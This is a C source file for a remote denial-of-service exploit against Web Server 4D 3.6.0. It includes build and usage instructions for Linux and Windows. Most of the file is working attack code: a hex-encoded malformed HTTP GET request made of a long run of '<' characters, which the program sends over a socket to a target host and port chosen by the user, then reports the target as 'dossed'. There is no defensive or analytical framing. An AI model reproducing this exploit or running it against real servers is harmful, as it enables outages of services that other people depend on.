Web server 4D 3.6.0 remote DOS exploit.
9ecb021967a204a4e0c6a30ce25bba730abc3141dc7ffad2d9d627831ae2f3b7
/* Web server 4D 3.6.0 denial of service */
/* bug found by badpack3t. */
/* ftp://ftp.mdgcs.com/demos/WS4D/Win/WS4D_3.6.0_Full.exe */
/* */
/* $ gcc -o f_ws4d f_ws4d.c (linux version) */
/* $ gcc -o f_ws4d f_ws4d.c -DWINDOWS (windows version) */
/* */
/* $ ./f_ws4d <hostname/ip> <port> */
/* */
/* Federico Fazzi <federico@autistici.org> */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#if WINDOWS
#include <winsock.h>
#pragma comment(lib, "ws2_32.lib")
#else
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
#include <netinet/in.h>
#include <netdb.h>
#endif
int usage(char *f);
char f_call[] =
"\x47\x45\x54\x20\x2F\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x20\x48\x54\x54\x50\x2F\x31\x2E\x31\x20";
int main(int argc, char *argv[]) {
#if WINDOWS
WSADATA wsaData;
WORD wVersionRequested;
int port;
int size;
SOCKET sockfd;
#else
int sockfd;
socklen_t size;
in_port_t port = atoi(argv[2]);
#endif
struct sockaddr_in structaddr;
struct hostent *sockhost;
char *reply = (char *)malloc(512);
if(argc < 2) usage((char *) basename(argv[0]));
#if WINDOWS
wVersionRequested = MAKEWORD(1, 1);
if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;
#endif
printf("* Webserver 4D 3.6.0 denial of service\n\n");
#if WINDOWS
if((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) ==
INVALID_SOCKET) {
perror("socket_func");
exit(1);
}
#else
if((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
perror("socket_func");
exit(1);
}
#endif
printf("getting socket.. done!\n");
sockhost = gethostbyname(argv[1]);
if(sockhost == NULL) herror("gethostbyname_func");
size = sizeof(structaddr);
memset((void *) &structaddr, 0x00, size);
bcopy(sockhost->h_addr, &structaddr.sin_addr, sockhost->h_length);
structaddr.sin_family = AF_INET;
structaddr.sin_port = htons((u_short)port);
printf("getting connection.. ");
if(connect(sockfd, (struct sockaddr *) &structaddr, size) == -1) {
printf("error!\n");
perror("connect_func");
exit(1);
}
printf("done!\n");
printf("sending exploit in hex format.. ");
if(write(sockfd, f_call, sizeof(f_call)) == -1) {
printf("error!\n");
perror("send_func");
exit(1);
}
printf("done!\n");
printf("target: %s on port %d have been dossed!\n\n",
sockhost->h_name, port);
#if WINDOWS
closesocket(sockfd);
#else
close(sockfd);
#endif
return(0);
}
int usage(char *f) {
printf("Webserver 4D 3.6.0 denial of service\n");
printf("Federico Fazzi <federico@autistici.org\n\n");
printf("$ gcc -o %s %s (linux version)\n", f, __FILE__);
printf("$ gcc -o %s %s -DWINDOWS (windows version\n", f, __FILE__);
return(1);
}